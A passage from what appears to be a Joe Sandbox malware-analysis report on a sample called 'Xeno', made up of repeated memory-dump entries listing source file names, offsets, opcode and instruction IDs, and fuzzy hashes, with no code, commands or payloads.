                            • Instruction Fuzzy Hash: 6911E1356487428BC704DF78DCC036BBBE1EB86224F294A3DE5829B691D274E806CB56
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 872da5f4682f98ba768673886593a07d8bcda457ff939a6e83b429fc997db95c
                            • Instruction ID: 4dc6f0b05bdc166c5e68359699ab43e9016e425f825e7dcee393f7bc6bb333a0
                            • Opcode Fuzzy Hash: 872da5f4682f98ba768673886593a07d8bcda457ff939a6e83b429fc997db95c
                            • Instruction Fuzzy Hash: 029249B0619B818FD365CF39C891B97BFE9AB4A300F14496EE1EAC7382C7746501CB59
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 62ee89081862f39c45727cad95027fa121b8760447092319d5c623e819af0499
                            • Instruction ID: 3e46d98b0d7b7391bfd4b2d703315793e04d9a17b4fe419fcdec6805aa5427a8
                            • Opcode Fuzzy Hash: 62ee89081862f39c45727cad95027fa121b8760447092319d5c623e819af0499
                            • Instruction Fuzzy Hash: 1542E236B14211CFCB08CF68D8916AEB7E2FB8E314F1A85BED946D7391D6349C418B84
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20fcca7321e9ad9a37a16830f0415b48849754dd7c00653520191071a511fe31
                            • Instruction ID: 9b597215c7a5d201b9e6edf1352a7e504651228658307191fe5d299f01b535d2
                            • Opcode Fuzzy Hash: 20fcca7321e9ad9a37a16830f0415b48849754dd7c00653520191071a511fe31
                            • Instruction Fuzzy Hash: 0332F236B14211CFDB08CF68D8A16AEB7A1FB8E314F1A85BED946D7391D6349C418B84
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd9351c2af6c86852d56228da41fed92cd066750c712350a5e113c975854dde7
                            • Instruction ID: 13ac6f09e44a3c4f27938eeb9ee488cdc88ec0ff74ab387f7bc0269203d2706a
                            • Opcode Fuzzy Hash: fd9351c2af6c86852d56228da41fed92cd066750c712350a5e113c975854dde7
                            • Instruction Fuzzy Hash: 39220336B14211CFDB18CF68D8A16AEB7E1FB8E314F1A85BEC946D7391D6349C418B84
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 657fbeb9bd83206196e65c2185f4f147248436a8db29e349b32bb40df6c8255e
                            • Instruction ID: 5b235b67c027ffdd562c063778a716c7615e7ef284c4e4779a3d3c4893e29fea
                            • Opcode Fuzzy Hash: 657fbeb9bd83206196e65c2185f4f147248436a8db29e349b32bb40df6c8255e
                            • Instruction Fuzzy Hash: 9752E1315083458BCB15CF18C0906AABBE1FF89304F198A7EF8996B381D778DA49CB85
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa0cf401dbd6132c7a04237e87eb557ddabe4e29919801e8bede5bc394010e27
                            • Instruction ID: 2a0666d03bf0ed086b0d38114e7a8d7b89f40c5865758370b92b9aabda8d6973
                            • Opcode Fuzzy Hash: fa0cf401dbd6132c7a04237e87eb557ddabe4e29919801e8bede5bc394010e27
                            • Instruction Fuzzy Hash: 2052B3B0A08B848FE735CB24C4843A7BBE1AF91314F15483ED5E717BC6C27DA9958B19
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                            • Instruction ID: 1e9becc2452d2d24063ff124eed0e70c5965ea21b12756984417d1b1b7eecbf0
                            • Opcode Fuzzy Hash: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                            • Instruction Fuzzy Hash: 8E229272A087118BD725DF18D8806ABB3E1BFC4315F19893ED986A7385D738B851CB87
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c40101fab6f704138d4421486847cddf638f588d23acbf7306a1daae2842fb01
                            • Instruction ID: 9d797c5af1a22ab3aef09000603e156738bbf4b120111d73ff578770c6aa86dd
                            • Opcode Fuzzy Hash: c40101fab6f704138d4421486847cddf638f588d23acbf7306a1daae2842fb01
                            • Instruction Fuzzy Hash: C7323370914B118FC338CF29C68052ABBF5BF85711B604A2ED697A7B90D73AF945CB18
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e81018361005d51b1839a835b18b01ba49e097ee0b8e4d053208fb7147f86ae2
                            • Instruction ID: 10e906e831395739cd1bbfe6f31be7f353901b1ccf8a7f1c0f62f8f2d08f69a6
                            • Opcode Fuzzy Hash: e81018361005d51b1839a835b18b01ba49e097ee0b8e4d053208fb7147f86ae2
                            • Instruction Fuzzy Hash: 6A02E03AA14211CFDB08CF68D8906AAB7E1FB8E310F1A857ED946D7391D635AC51CB84
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1c79cea8c21c1551f9c304eebe12a7f7e776e847900fd2c5156c30755aa89e5
                            • Instruction ID: 0c2d90faf75ce120585b1b83b2bbddd3d001fe72fa9a953c5be3bde865bfb931
                            • Opcode Fuzzy Hash: e1c79cea8c21c1551f9c304eebe12a7f7e776e847900fd2c5156c30755aa89e5
                            • Instruction Fuzzy Hash: DBF1FF36A14211CFCB18CF68D8906AEB7E1FB8E310F1A857ED946D7391D6359C51CB84
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
                            • Instruction ID: afaab944370aa91e7974f786260b444f5c6cfa69a2d93ff5ed5d754e8c08c566
                            • Opcode Fuzzy Hash: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
                            • Instruction Fuzzy Hash: 90E17A7120C7419FD720DF29C880A2BBBE1EF99304F44882EE5D597791E379E944CB9A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4bba5e74d41eae1e4958b26b1ebb3033613be514ef7f957b1aaf651473e05aac
                            • Instruction ID: 64cab8d7c45886be436990a6a78fe6300b02e1bd66a528804651186d91799465
                            • Opcode Fuzzy Hash: 4bba5e74d41eae1e4958b26b1ebb3033613be514ef7f957b1aaf651473e05aac
                            • Instruction Fuzzy Hash: 2BC11575908300AFD7108F24CC41B5BBBE2EFD8315F148A2EF4D8972A1D77A9D558B86
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a875727e4fd240dff73eb78aaaeec281654b0a39b6f59cfb8331ab8cb321c76
                            • Instruction ID: 7df6fb6829b482a7b11a8e8092fb8d715825f7ed6b82a3d6d64e529f2e362b1b
                            • Opcode Fuzzy Hash: 6a875727e4fd240dff73eb78aaaeec281654b0a39b6f59cfb8331ab8cb321c76
                            • Instruction Fuzzy Hash: 4DC16AB9204B00DFD7248F25EC91B27B7F5FB8A311F15893DE99683A90D738A815CB58
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a47cf4779e96c498a3bacb3a1360b7721c88dbd32f3e99254b456f432f8d3c8a
                            • Instruction ID: 94bd1b3f37b884ee677b01720a6780fb8747e51e689f8dd532ec262a34bd8082
                            • Opcode Fuzzy Hash: a47cf4779e96c498a3bacb3a1360b7721c88dbd32f3e99254b456f432f8d3c8a
                            • Instruction Fuzzy Hash: 3EC16BB29087418FC360CF68DC86BABB7E1BF85318F09492DD1DAD6342D778A155CB4A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1cb46e16346a915ec0461da78c75c811686a4e1458ec74ae9b6d7cd95a514cd
                            • Instruction ID: c3d58489cbdbe8c142961ffcdfd25de56b96cb5ef0e625aebb4281d22dc1a80b
                            • Opcode Fuzzy Hash: e1cb46e16346a915ec0461da78c75c811686a4e1458ec74ae9b6d7cd95a514cd
                            • Instruction Fuzzy Hash: A4A1CFB4A083118FD714DF68D85072EB7E1EB86304F49457DE985A7392EB79AC04CB8A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5f0265a36c924ea412a42a01b3497823e1013ebb20de01a9d488d6b5b619131c
                            • Instruction ID: 0a99e35862e929ba1edce5c86475662fc36c3fcb7b46ae039f3e7de6a3628fb5
                            • Opcode Fuzzy Hash: 5f0265a36c924ea412a42a01b3497823e1013ebb20de01a9d488d6b5b619131c
                            • Instruction Fuzzy Hash: 08914C726082614BC7158E28C8912ABBBD1DB85324F19C67EECF99B7C2C7389C46D7D1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a3a60b4231a956822cb534ed781e35010fa98406663c9425735573f7fbd74d5
                            • Instruction ID: ab1fa2557c44bb7c530e5b230bbabe4550a355c3e80b79fe1179f622f7d467b3
                            • Opcode Fuzzy Hash: 0a3a60b4231a956822cb534ed781e35010fa98406663c9425735573f7fbd74d5
                            • Instruction Fuzzy Hash: 0ED19321D087DA8ACB22C6BC88482CDBFB15F67234F184399E4F56B3D6D7644942C7A6
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 263c2ef4b102f6d64fed50ffc9ce4ea3334cf3049dec0d06d218e2b4ef7ff365
                            • Instruction ID: 9cc43240adb88bd219f3f1ea5a1ff5186a9c604b40530c22f65039ebf468ccf8
                            • Opcode Fuzzy Hash: 263c2ef4b102f6d64fed50ffc9ce4ea3334cf3049dec0d06d218e2b4ef7ff365
                            • Instruction Fuzzy Hash: E6A1E562608BC08FC3259B38C855397BFE25F96324F188A6DD4EB87792D638A409C756
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 46c07590fb4c23fdb7348343b9049922dc08f8f4880035e72b8414dba3b5ed43
                            • Instruction ID: 964ba1c99511291c6549503b32feb68e5d77739b3bf5c364c571a87e99271816
                            • Opcode Fuzzy Hash: 46c07590fb4c23fdb7348343b9049922dc08f8f4880035e72b8414dba3b5ed43
                            • Instruction Fuzzy Hash: 6A5134706093518BD7188F24C4617BBB7F2EF96314F18881DE8C65B391E778C945C79A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4a9c2d8b0f2fa5d3848dccf5739e93bb44efbdb49ec70a9784c4828a2d371fbe
                            • Instruction ID: 1b7dc95f2bb3ef49513049ecaa80f5de5d8a479ca20573e1a1938d6b818bba41
                            • Opcode Fuzzy Hash: 4a9c2d8b0f2fa5d3848dccf5739e93bb44efbdb49ec70a9784c4828a2d371fbe
                            • Instruction Fuzzy Hash: 4FA10471509FC08FD3258B38C8953A7BFE19F96324F188A6DC5EA877C2D639A409C716
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 470f47c29065d71bd3e8ed05e0d0ccc229ebecd17263815bd2c9eb64167ea049
                            • Instruction ID: 0b4367273e2ac0780b541d2be758f7a083ad16d243ce2d220f8705cf06ae3663
                            • Opcode Fuzzy Hash: 470f47c29065d71bd3e8ed05e0d0ccc229ebecd17263815bd2c9eb64167ea049
                            • Instruction Fuzzy Hash: E181A2342042058BE724DF18D890A6BB3F1EF99714F14866DEA948B3B1DB35DC91CB4A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 54f87d89e86721d45ea670cd844e47110252a31b5d73305b73774d2b51844bcb
                            • Instruction ID: 19c571fd693ec990de500c8aebb91ab7d8b7bd3eac4b65ed18e20e34b4adca4c
                            • Opcode Fuzzy Hash: 54f87d89e86721d45ea670cd844e47110252a31b5d73305b73774d2b51844bcb
                            • Instruction Fuzzy Hash: 95713A33719A904BD3288A3C4C512AABE830BDB334F3ED76EE5F18B3E1D56948024355
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ebb854b93884d47597612efc05219a350964ab2ba15a9ba7697f3b7cf95e6cc
                            • Instruction ID: bf895229596975545681845f05c82837bae0d2da37012269a61926e52c2c9c87
                            • Opcode Fuzzy Hash: 6ebb854b93884d47597612efc05219a350964ab2ba15a9ba7697f3b7cf95e6cc
                            • Instruction Fuzzy Hash: 78613736B596818BC7188E3C5CA52EAAA834BD7330F2CC37ED9B58B3E5C55C4C468356
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2573f4719076280f9081c71ab03c6e5eb130c8d9f1a247b555b6dfa6d5fa1b5e
                            • Instruction ID: c5ddfaa82ed4cdddec0ebd0cb8a484fdac38e99f75c9d8d516e90df6edbc77c4
                            • Opcode Fuzzy Hash: 2573f4719076280f9081c71ab03c6e5eb130c8d9f1a247b555b6dfa6d5fa1b5e
                            • Instruction Fuzzy Hash: 66515C76B082A047C7189E64EC9217FB3D2EB96314F4B483EE982C7780E67C9805C75A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e848ac17aeaa9a63ac664f1b0d029720cd8936e29b9b70f95f5fd55a41942cb
                            • Instruction ID: dd765c1007c0063bbc284ed99e3836f84c20071e48af44568b62126e4260c04f
                            • Opcode Fuzzy Hash: 6e848ac17aeaa9a63ac664f1b0d029720cd8936e29b9b70f95f5fd55a41942cb
                            • Instruction Fuzzy Hash: FD61EC72E045504FD708CE7DCC513AF7AA2EB8A330F19836EEA769B3D5CA3848058795
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bda84cd0dd2d832cbe0bb09323e108403c23b8d3d2b3f1482efbea44335fe5e4
                            • Instruction ID: bbd24c8d1ec5d39f568975cef260b7b959216e01e04ada5d6ff254d8a7342010
                            • Opcode Fuzzy Hash: bda84cd0dd2d832cbe0bb09323e108403c23b8d3d2b3f1482efbea44335fe5e4
                            • Instruction Fuzzy Hash: 7B515CB15087548FE714DF29D49435BBBE1BBC8318F044A2EE5E987390E779DA088B86
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 46f8f337f22e02d04a0e2d37d0cc0ce0aa297bed9e0a1afc6f23890ecae723a5
                            • Instruction ID: f86eb67565c442f126d44a9fc2ea82268c758345b0b106f305f92bbc5d7c4fb8
                            • Opcode Fuzzy Hash: 46f8f337f22e02d04a0e2d37d0cc0ce0aa297bed9e0a1afc6f23890ecae723a5
                            • Instruction Fuzzy Hash: DF511336A18311CFC708CF28D99056BB7E1FB8A700F0A887DEDC693291D635E8519B95
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 609ec896ddb562d4e22ed4c0cc1487c53ef4e61f49ce1a93a67459b748502ac8
                            • Instruction ID: d36d9cbe7017fb3b724121fb30ccb97f7bb09f714ff0b0c1a329a590b79bd43c
                            • Opcode Fuzzy Hash: 609ec896ddb562d4e22ed4c0cc1487c53ef4e61f49ce1a93a67459b748502ac8
                            • Instruction Fuzzy Hash: 6751F431608211CFDB218F24DC823DB73F1EF85318F05893DE98A8B292DB799946D796
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d2b4147b0c33ffffbca9aeb70c0d341d23aa88f0486baf88956de86d2ec1176
                            • Instruction ID: cce8a30017c5c9029ce8138481df1a1f5907d11f291a39d8f2ae67990d89bee5
                            • Opcode Fuzzy Hash: 0d2b4147b0c33ffffbca9aeb70c0d341d23aa88f0486baf88956de86d2ec1176
                            • Instruction Fuzzy Hash: EA411EB06493A08AD7309F24D86136BB3F1FFA2300F446A1DD5D14F7A6EB798540DB4A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9d28f3aa5901e9695b29893484d7d223314e0abc8c5db0e409570cf9815bd019
                            • Instruction ID: 3277df123f6d12a6cfdd39d99e6dc8e3eddc28dcb88e1f49470f458588e81730
                            • Opcode Fuzzy Hash: 9d28f3aa5901e9695b29893484d7d223314e0abc8c5db0e409570cf9815bd019
                            • Instruction Fuzzy Hash: E33157B1A04300ABE714AE15ED51B3BB7A8DF89748F10582DFA9953242E335ED0087DB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e3050211ca69d08b0a5865b02cb13b43dc5ed76d776bfcb1a98241992f1b736
                            • Instruction ID: c96795e88930af48fe39d639d2fbc3475bf893d2a107e9313ce8220226ca3bfd
                            • Opcode Fuzzy Hash: 1e3050211ca69d08b0a5865b02cb13b43dc5ed76d776bfcb1a98241992f1b736
                            • Instruction Fuzzy Hash: 8C312432F082500FCB18DF358C9123BBAD79FDA214F29D53EC496CB266C928C90A8649
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d8a27910de914bda2216dff7dbaf711d2501371b8c3a7ed62d201147104d8b8
                            • Instruction ID: bca9753c0db80727d97926559bcf6bbce384b6e40a89ff9267eea02be64979a6
                            • Opcode Fuzzy Hash: 5d8a27910de914bda2216dff7dbaf711d2501371b8c3a7ed62d201147104d8b8
                            • Instruction Fuzzy Hash: 6A314873E21A3407D7088D3E9C5026AB1C35BD5265B9EC379ED699F3C6DA34DC1282D0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4775e5fd683a2476c83e46e66ebfda2bf2ebff5d5b936a88187511111cdf3d5
                            • Instruction ID: 838d05a402944fcbd4815cc20ba2c9b8401c5b9d6a2c11771bdc51aa1eca9dd1
                            • Opcode Fuzzy Hash: a4775e5fd683a2476c83e46e66ebfda2bf2ebff5d5b936a88187511111cdf3d5
                            • Instruction Fuzzy Hash: 2D316022B453718AD710C52944C12A2BF039B56365F9D876AC9511B3C7C21BED0BD3DE
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 34885059f9085e4bbcfbbcd216d759fcf1971f6b3b9d4a29b5fa11b818d26347
                            • Instruction ID: 89ce3e1cd63448e95d9ea977b6249ea921f7a27e259004478ee486d731a73b76
